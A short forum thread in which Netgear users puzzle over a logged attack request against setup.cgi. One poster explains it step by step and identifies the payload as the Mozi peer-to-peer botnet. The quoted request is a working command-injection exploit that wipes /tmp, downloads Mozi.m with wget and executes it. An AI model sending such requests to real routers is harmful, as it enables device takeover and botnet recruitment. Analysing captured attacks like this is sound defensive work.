Forum Discussion
NetGear users...
What do you think this does: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+htp://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 Chi...
It possibly does a bad thing...
I'd bet on it.
My question is, because I'm not really well versed in all of this stuff, what it is they're doing. Are they trying to take control of the router? Make it be a kind of bot? Is it just simple hacking to get to personal info, or is it something more nefarious?
run setup.cgi using netgear.cfg then run a shell consisting of the following commands:
1. rm -rf /tmp/* - delete everything in /tmp
2. wget 192.168.1.1:8088/Mozi.m -O /tmp/netgear - get 192.168.1.1:8088/Mozi.m as /tmp/netgear
sh netgear - run it...
curpath=/ - ...from root
currentsetting/htm=1 - no idea what that means.
According to https://www.digitalmunition.me/new-mozi-p2p-botnet-attacks-netgear-gpon-d-link-and-huawei-routers/ and https://blog.netlab.360.com/mozi-another-botnet-using-dht/, Mozi.m is a DHT point-2-point botnet.
The real question is how it's getting it to install. Is 192.168.1.1:8088 is an exploit to mask the requester's own IP address and port so it's actually telling the router to get it from the requesting IP?
